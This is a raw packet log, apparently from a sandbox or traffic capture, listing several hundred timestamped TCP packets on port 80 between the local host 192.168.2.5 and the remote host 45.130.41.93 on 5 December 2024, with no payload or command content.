Dec 5, 2024 21:50:13.470527887 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.470552921 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.470886946 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.471299887 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.471498013 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.471520901 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.471926928 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.472098112 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.472206116 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.472230911 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.472250938 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.472903013 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.473028898 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.473120928 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.474987984 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.475044966 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.475055933 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.475095034 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.475157976 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.475178003 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.475328922 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.475349903 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.475470066 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.475500107 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.476181030 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.476205111 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.476294041 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.476294994 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.476428032 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.476994038 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.477140903 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.477164984 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.477226019 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.477921009 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.477987051 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.477994919 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.478135109 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.478615999 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.478847027 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.478869915 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.479516983 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.479599953 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.479623079 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.480256081 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.480281115 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.480360031 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.480731964 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.481055975 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.481189966 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.481857061 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.481957912 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.481998920 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.482652903 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.482770920 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.482923031 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.483002901 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.483479977 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.483598948 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.483829021 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.484288931 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.484369040 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.484486103 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.485129118 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.485204935 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.485258102 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.485968113 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.486032009 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.486042023 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.486109018 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.486768007 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.486840010 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.486958027 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.487160921 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.487561941 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.487689018 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.487710953 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.488392115 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.488452911 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.488526106 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.488574982 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.489185095 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.489255905 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.489351034 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.489567041 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.489999056 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.490087986 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.490166903 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.490895987 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.490955114 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.490997076 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.491657972 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.491859913 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.491883039 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.492044926 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.493006945 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.493065119 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.493129969 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.493350983 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.493432045 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.493464947 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.493551016 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.494100094 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.494287014 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.494309902 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.494888067 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.494992018 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.495016098 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.495203018 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.495685101 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.495783091 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.495812893 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.495868921 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.496511936 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.496628046 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.496651888 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.496757030 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.497344017 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.497411966 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.497442007 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.497549057 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.498169899 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.498307943 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.498332977 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.499002934 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.499321938 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.499325037 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.499896049 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.499999046 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.500029087 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.500089884 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.500557899 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.500601053 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.500624895 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.500700951 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.501382113 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.501475096 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.501665115 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.502191067 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.502264977 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.502288103 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.503040075 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.503081083 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.503103018 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.503376961 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.504611015 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.504771948 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.653636932 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.653695107 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.653873920 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.654021025 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.654047966 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.654674053 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.654972076 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.654995918 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.655121088 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.655828953 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.655853033 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.656016111 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.656266928 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.656591892 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.656704903 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.657413006 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.657435894 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.657489061 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.658219099 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.658246040 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.658324957 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.659068108 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.659094095 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.659157991 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.659872055 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.659893990 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.659981012 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.660661936 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.660686970 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.660768986 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.661484957 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.661509991 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.661597967 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.662312031 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.662337065 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.662395954 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.663109064 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.663132906 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.663224936 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.663954020 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.663980961 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.664002895 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.664741993 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.664767981 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.664850950 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.664875984 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.665563107 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.665673018 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.665697098 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.666383982 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.666503906 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.666536093 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.667232990 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.667308092 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.667339087 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.667718887 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.667982101 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.668159962 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.668335915 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.668809891 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.668930054 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.668989897 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.669642925 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.669750929 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.670425892 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.670449972 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.670564890 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.671242952 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.671267033 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.671281099 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.672029972 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.672053099 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.672108889 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.672218084 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.672861099 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.672946930 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.673698902 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.673723936 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.673887968 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.674491882 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.674520969 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.674602985 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.675337076 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.675348997 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.675363064 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.675991058 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.676114082 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.676225901 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.676959991 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.676983118 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.677043915 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.677746058 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.677769899 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.677846909 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.678570986 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.678596020 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.678775072 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.679447889 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.679461002 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.679472923 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.680011988 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.680182934 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.680334091 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.680986881 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.681010962 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.681040049 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.681833029 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.681855917 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.681946039 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.682657957 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.682682991 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.682734013 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.683445930 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.683468103 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.683554888 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.683928013 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.684226990 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.684387922 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.685065031 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.685091972 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.685254097 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.685906887 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.685930014 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.686009884 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.686722994 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.686745882 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.686836004 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.687552929 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.687575102 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.687658072 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.687961102 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.688354969 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.688484907 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.689182997 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.689205885 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.689276934 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.689944983 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.689970016 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.690190077 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.690757036 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.690776110 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.690845966 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.691580057 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.691602945 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.691621065 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.691926956 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.692373991 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.692485094 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.693192005 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.693218946 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.693320990 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.694025040 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.694048882 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.694147110 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.694864035 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.694889069 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.695024014 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.695663929 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.695688009 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.695827007 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.695962906 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.845561028 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.845931053 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.845944881 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.845964909 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.845976114 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.845999956 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.846038103 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.847162008 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.847213984 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.847249985 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.847290039 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.847881079 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.847919941 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.847959042 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.847996950 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.848397017 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.848438978 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.848510027 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.848548889 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.849200010 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.849245071 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.849273920 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.849315882 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.849916935 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.850023985 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.850061893 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.850729942 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.850831032 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.850872993 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.851547003 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.851593971 CET	49710	80	192.168.2.5	45.130.41.93
Dec 5, 2024 21:50:13.851660967 CET	80	49710	45.130.41.93	192.168.2.5
Dec 5, 2024 21:50:13.851708889 CET	49710	80	192.168.2.5	45.130.41.93
